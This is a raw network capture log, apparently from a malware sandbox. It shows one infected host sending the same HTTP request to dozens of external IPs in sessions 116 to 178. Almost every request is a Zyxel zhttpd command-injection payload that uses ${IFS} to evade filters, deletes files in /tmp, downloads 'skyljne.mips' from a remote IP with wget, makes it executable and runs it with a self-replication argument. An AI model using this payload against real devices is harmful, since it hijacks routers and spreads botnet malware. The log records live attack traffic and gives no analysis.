                                          Jan 14, 2024 15:45:50.652704954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          116192.168.2.234162482.189.183.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652740002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          117192.168.2.235677853.126.212.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652810097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          118192.168.2.234121686.80.49.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652825117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          119192.168.2.2349118146.13.63.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652843952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          120192.168.2.2359724155.12.251.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652868032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          121192.168.2.2345142154.97.68.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652893066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          122192.168.2.234526075.28.102.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652906895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          123192.168.2.234607239.167.175.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652957916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          124192.168.2.2349998120.127.142.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652987957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          125192.168.2.2358660157.3.168.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653011084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          126192.168.2.236020439.52.191.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653053999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          127192.168.2.2356740184.46.80.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653126955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          128192.168.2.233888818.31.91.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653130054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          129192.168.2.233458476.39.32.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653188944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          130192.168.2.235380650.171.223.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653194904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          131192.168.2.2338466172.66.81.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653197050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          132192.168.2.2352064137.46.106.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653228998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          133192.168.2.2334018190.173.12.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653253078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          134192.168.2.2356388204.7.164.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653316975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          135192.168.2.235557246.189.140.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653331041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          136192.168.2.2342648109.176.31.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653387070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          137192.168.2.2333054205.96.229.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653424978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          138192.168.2.2356950211.88.243.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653469086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          139192.168.2.235945888.100.209.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653485060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          140192.168.2.2337630129.15.67.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653523922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          141192.168.2.2338760144.90.236.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653538942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          142192.168.2.234454620.75.16.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653582096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          143192.168.2.2353348138.253.12.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653587103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          144192.168.2.2339800196.243.27.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653654099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          145192.168.2.2352548172.245.204.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653667927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          146192.168.2.2344934178.187.13.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653734922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          147192.168.2.2353826112.243.36.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653748035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          148192.168.2.235201889.70.47.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653815985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          149192.168.2.2356968102.230.90.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653853893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          150192.168.2.2350896135.193.111.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653853893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          151192.168.2.233337223.170.216.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653955936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          152192.168.2.2352656199.138.247.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653969049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          153192.168.2.2341286106.60.26.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653975010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          154192.168.2.2353912207.254.215.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.653997898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          155192.168.2.233483257.226.118.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654052973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          156192.168.2.2360144139.225.34.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654103994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          157192.168.2.2342370167.107.249.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654130936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          158192.168.2.235319470.223.92.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654160976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          159192.168.2.2359656208.128.42.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654177904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          160192.168.2.2348836105.56.200.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654241085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          161192.168.2.234755462.101.115.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654266119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          162192.168.2.235359472.187.223.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654314041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          163192.168.2.2339022171.173.205.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654330015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          164192.168.2.2353044186.49.33.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654386997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          165192.168.2.235292046.196.213.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654447079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          166192.168.2.2359798134.44.62.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654453993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          167192.168.2.2341214198.203.19.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654450893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          168192.168.2.233317227.133.77.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654494047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          169192.168.2.2355340187.199.89.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654525042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          170192.168.2.2345304179.127.203.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654536963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          171192.168.2.23354245.22.231.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654537916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          172192.168.2.2335778194.217.76.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654536963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          173192.168.2.2345672130.24.78.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654608011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          174192.168.2.233963899.220.126.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654608011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          175192.168.2.2348768105.79.29.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654649973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          176192.168.2.2340760129.164.64.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654649973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          177192.168.2.234524270.108.41.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654650927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          178192.168.2.2341056223.91.14.65443
                                          TimestampBytes transferredDirectionData
